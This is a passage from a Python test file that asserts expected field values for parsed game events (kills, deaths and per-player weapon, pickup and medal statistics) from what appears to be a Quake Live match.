assert e[71]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[71]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[71]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[71]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[71]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[71]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[71]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[71]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[71]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[71]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[71]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[71]['DATA']['WARMUP'] == False # noqa
assert e[71]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[72]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[72]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[72]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[72]['DATA']['KILLER']['BOT'] is None # noqa
assert e[72]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[72]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[72]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[72]['DATA']['KILLER']['NAME'] is None # noqa
assert e[72]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[72]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[72]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[72]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[72]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[72]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[72]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[72]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[72]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[72]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[72]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[72]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[72]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[72]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[72]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[72]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[72]['DATA']['ROUND'] is None # noqa
assert e[72]['DATA']['SUICIDE'] is None # noqa
assert e[72]['DATA']['TEAMKILL'] is None # noqa
assert e[72]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[72]['DATA']['TEAM_DEAD'] is None # noqa
assert e[72]['DATA']['TIME'] == 313.0 # noqa
assert e[72]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[72]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[72]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[72]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[72]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[72]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[72]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[72]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[72]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[72]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[72]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[72]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[72]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[72]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[72]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[72]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[72]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[72]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[72]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[72]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[72]['DATA']['WARMUP'] == False # noqa
assert e[72]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[73]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[73]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[73]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[73]['DATA']['KILLER']['BOT'] is None # noqa
assert e[73]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[73]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[73]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[73]['DATA']['KILLER']['NAME'] is None # noqa
assert e[73]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[73]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[73]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[73]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[73]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[73]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[73]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[73]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[73]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[73]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[73]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[73]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[73]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[73]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[73]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[73]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[73]['DATA']['ROUND'] is None # noqa
assert e[73]['DATA']['SUICIDE'] is None # noqa
assert e[73]['DATA']['TEAMKILL'] is None # noqa
assert e[73]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[73]['DATA']['TEAM_DEAD'] is None # noqa
assert e[73]['DATA']['TIME'] == 313.0 # noqa
assert e[73]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[73]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[73]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[73]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[73]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[73]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[73]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[73]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[73]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[73]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[73]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[73]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[73]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[73]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[73]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[73]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[73]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[73]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[73]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[73]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[73]['DATA']['WARMUP'] == False # noqa
assert e[73]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[74]['DATA']['ABORTED'] == False # noqa
assert e[74]['DATA']['BLUE_FLAG_PICKUPS'] == 0 # noqa
assert e[74]['DATA']['DAMAGE']['DEALT'] == 3185 # noqa
assert e[74]['DATA']['DAMAGE']['TAKEN'] == 1081 # noqa
assert e[74]['DATA']['DEATHS'] == 0 # noqa
assert e[74]['DATA']['HOLY_SHITS'] == 0 # noqa
assert e[74]['DATA']['KILLS'] == 0 # noqa
assert e[74]['DATA']['LOSE'] == 0 # noqa
assert e[74]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[74]['DATA']['MAX_STREAK'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['ACCURACY'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['ASSISTS'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['CAPTURES'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['COMBOKILL'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['DEFENDS'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['EXCELLENT'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['FIRSTFRAG'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['HEADSHOT'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['HUMILIATION'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['IMPRESSIVE'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['MIDAIR'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['PERFECT'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['PERFORATED'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['QUADGOD'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['RAMPAGE'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['REVENGE'] == 0 # noqa
assert e[74]['DATA']['MODEL'] is None # noqa
assert e[74]['DATA']['NAME'] == 'Bartoszer' # noqa
assert e[74]['DATA']['NEUTRAL_FLAG_PICKUPS'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['AMMO'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['ARMOR'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['ARMOR_REGEN'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['BATTLESUIT'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['DOUBLER'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['FLIGHT'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['GREEN_ARMOR'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['GUARD'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['HASTE'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['HEALTH'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['INVIS'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['INVULNERABILITY'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['KAMIKAZE'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['MEDKIT'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['MEGA_HEALTH'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['OTHER_HOLDABLE'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['OTHER_POWERUP'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['PORTAL'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['QUAD'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['RED_ARMOR'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['REGEN'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['SCOUT'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['TELEPORTER'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['TOTAL_ARMOR'] == 550 # noqa
assert e[74]['DATA']['PICKUPS']['TOTAL_HEALTH'] == 100 # noqa
assert e[74]['DATA']['PICKUPS']['YELLOW_ARMOR'] == 0 # noqa
assert e[74]['DATA']['PLAY_TIME'] == 0 # noqa
assert e[74]['DATA']['QUIT'] is None # noqa
assert e[74]['DATA']['RANK'] == 0 # noqa
assert e[74]['DATA']['RED_FLAG_PICKUPS'] == 0 # noqa
assert e[74]['DATA']['SCORE'] == 0 # noqa
assert e[74]['DATA']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[74]['DATA']['TEAM'] is None # noqa
assert e[74]['DATA']['TEAM_JOIN_TIME'] == 0 # noqa
assert e[74]['DATA']['TEAM_RANK'] is None # noqa
assert e[74]['DATA']['TIED_RANK'] is None # noqa
assert e[74]['DATA']['TIED_TEAM_RANK'] is None # noqa
assert e[74]['DATA']['TIME'] == 315.2 # noqa
assert e[74]['DATA']['WARMUP'] == False # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['D'] is None # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['DG'] is None # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['DR'] is None # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['H'] == 8 # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['K'] is None # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['P'] is None # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['S'] == 0 # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['T'] is None # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['D'] is None # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['DG'] is None # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['DR'] is None # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['H'] == 78 # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['K'] is None # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['P'] is None # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['S'] == 209 # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['T'] is None # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['D'] is None # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['DG'] is None # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['DR'] is None # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['H'] == 23 # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['K'] is None # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['P'] is None # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['S'] == 152 # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['T'] is None # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['D'] is None # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['DG'] is None # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['DR'] is None # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['H'] == 19 # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['K'] is None # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['P'] is None # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['S'] == 126 # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['T'] is None # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['D'] is None # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['DG'] is None # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['DR'] is None # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['H'] == 18 # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['K'] is None # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['P'] is None # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['S'] == 44 # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['T'] is None # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['D'] is None # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['DG'] is None # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['DR'] is None # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['H'] == 0 # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['K'] is None # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['P'] is None # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['S'] == 0 # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['T'] is None # noqa
assert e[74]['DATA']['WIN'] == 0 # noqa
assert e[74]['TYPE'] == 'PLAYER_STATS' # noqa
assert e[75]['DATA']['ABORTED'] == False # noqa
assert e[75]['DATA']['BLUE_FLAG_PICKUPS'] == 0 # noqa
assert e[75]['DATA']['DAMAGE']['DEALT'] == 1185 # noqa
assert e[75]['DATA']['DAMAGE']['TAKEN'] == 1938 # noqa
assert e[75]['DATA']['DEATHS'] == 0 # noqa
assert e[75]['DATA']['HOLY_SHITS'] == 0 # noqa
assert e[75]['DATA']['KILLS'] == 0 # noqa
assert e[75]['DATA']['LOSE'] == 0 # noqa
assert e[75]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[75]['DATA']['MAX_STREAK'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['ACCURACY'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['ASSISTS'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['CAPTURES'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['COMBOKILL'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['DEFENDS'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['EXCELLENT'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['FIRSTFRAG'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['HEADSHOT'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['HUMILIATION'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['IMPRESSIVE'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['MIDAIR'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['PERFECT'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['PERFORATED'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['QUADGOD'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['RAMPAGE'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['REVENGE'] == 0 # noqa
assert e[75]['DATA']['MODEL'] is None # noqa
assert e[75]['DATA']['NAME'] == 'Daemia' # noqa
assert e[75]['DATA']['NEUTRAL_FLAG_PICKUPS'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['AMMO'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['ARMOR'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['ARMOR_REGEN'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['BATTLESUIT'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['DOUBLER'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['FLIGHT'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['GREEN_ARMOR'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['GUARD'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['HASTE'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['HEALTH'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['INVIS'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['INVULNERABILITY'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['KAMIKAZE'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['MEDKIT'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['MEGA_HEALTH'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['OTHER_HOLDABLE'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['OTHER_POWERUP'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['PORTAL'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['QUAD'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['RED_ARMOR'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['REGEN'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['SCOUT'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['TELEPORTER'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['TOTAL_ARMOR'] == 325 # noqa
assert e[75]['DATA']['PICKUPS']['TOTAL_HEALTH'] == 80 # noqa
assert e[75]['DATA']['PICKUPS']['YELLOW_ARMOR'] == 0 # noqa
assert e[75]['DATA']['PLAY_TIME'] == 0 # noqa
assert e[75]['DATA']['QUIT'] is None # noqa
assert e[75]['DATA']['RANK'] == 0 # noqa
assert e[75]['DATA']['RED_FLAG_PICKUPS'] == 0 # noqa
assert e[75]['DATA']['SCORE'] == 0 # noqa
assert e[75]['DATA']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[75]['DATA']['TEAM'] is None # noqa
assert e[75]['DATA']['TEAM_JOIN_TIME'] == 0 # noqa
assert e[75]['DATA']['TEAM_RANK'] is None # noqa
assert e[75]['DATA']['TIED_RANK'] is None # noqa
assert e[75]['DATA']['TIED_TEAM_RANK'] is None # noqa
assert e[75]['DATA']['TIME'] == 315.2 # noqa
assert e[75]['DATA']['WARMUP'] == False # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['D'] is None # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['DG'] is None # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['DR'] is None # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['H'] == 67 # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['K'] is None # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['P'] is None # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['S'] == 497 # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['T'] is None # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['D'] is None # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['DG'] is None # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['DR'] is None # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['H'] == 31 # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['K'] is None # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['P'] is None # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['S'] == 136 # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['T'] is None # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['D'] is None # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['DG'] is None # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['DR'] is None # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['H'] == 1 # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['K'] is None # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['P'] is None # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['S'] == 10 # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['T'] is None # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['D'] is None # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['DG'] is None # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['DR'] is None # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['H'] == 9 # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['K'] is None # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['P'] is None # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['S'] == 22 # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['T'] is None # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['D'] is None # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['DG'] is None # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['DR'] is None # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['H'] == 48 # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['K'] is None # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['P'] is None # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['S'] == 330 # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['T'] is None # noqa
assert e[75]['DATA']['WIN'] == 0 # noqa
assert e[75]['TYPE'] == 'PLAYER_STATS' # noqa
assert e[76]['DATA']['ABORTED'] == False # noqa
assert e[76]['DATA']['BLUE_FLAG_PICKUPS'] == 0 # noqa
assert e[76]['DATA']['DAMAGE']['DEALT'] == 871 # noqa
assert e[76]['DATA']['DAMAGE']['TAKEN'] == 2222 # noqa
assert e[76]['DATA']['DEATHS'] == 0 # noqa
assert e[76]['DATA']['HOLY_SHITS'] == 0 # noqa
assert e[76]['DATA']['KILLS'] == 0 # noqa
assert e[76]['DATA']['LOSE'] == 0 # noqa
assert e[76]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[76]['DATA']['MAX_STREAK'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['ACCURACY'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['ASSISTS'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['CAPTURES'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['COMBOKILL'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['DEFENDS'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['EXCELLENT'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['FIRSTFRAG'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['HEADSHOT'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['HUMILIATION'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['IMPRESSIVE'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['MIDAIR'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['PERFECT'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['PERFORATED'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['QUADGOD'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['RAMPAGE'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['REVENGE'] == 0 # noqa
assert e[76]['DATA']['MODEL'] is None # noqa
assert e[76]['DATA']['NAME'] == 'Doom' # noqa
assert e[76]['DATA']['NEUTRAL_FLAG_PICKUPS'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['AMMO'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['ARMOR'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['ARMOR_REGEN'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['BATTLESUIT'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['DOUBLER'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['FLIGHT'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['GREEN_ARMOR'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['GUARD'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['HASTE'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['HEALTH'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['INVIS'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['INVULNERABILITY'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['KAMIKAZE'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['MEDKIT'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['MEGA_HEALTH'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['OTHER_HOLDABLE'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['OTHER_POWERUP'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['PORTAL'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['QUAD'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['RED_ARMOR'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['REGEN'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['SCOUT'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['TELEPORTER'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['TOTAL_ARMOR'] == 525 # noqa
assert e[76]['DATA']['PICKUPS']['TOTAL_HEALTH'] == 170 # noqa
assert e[76]['DATA']['PICKUPS']['YELLOW_ARMOR'] == 0 # noqa
assert e[76]['DATA']['PLAY_TIME'] == 0 # noqa
assert e[76]['DATA']['QUIT'] is None # noqa
assert e[76]['DATA']['RANK'] == 0 # noqa
assert e[76]['DATA']['RED_FLAG_PICKUPS'] == 0 # noqa
assert e[76]['DATA']['SCORE'] == 0 # noqa
assert e[76]['DATA']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[76]['DATA']['TEAM'] is None # noqa
assert e[76]['DATA']['TEAM_JOIN_TIME'] == 0 # noqa
assert e[76]['DATA']['TEAM_RANK'] is None # noqa
assert e[76]['DATA']['TIED_RANK'] is None # noqa
assert e[76]['DATA']['TIED_TEAM_RANK'] is None # noqa
assert e[76]['DATA']['TIME'] == 315.2 # noqa
assert e[76]['DATA']['WARMUP'] == False # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['D'] is None # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['DG'] is None # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['DR'] is None # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['H'] == 26 # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['K'] is None # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['P'] is None # noqa
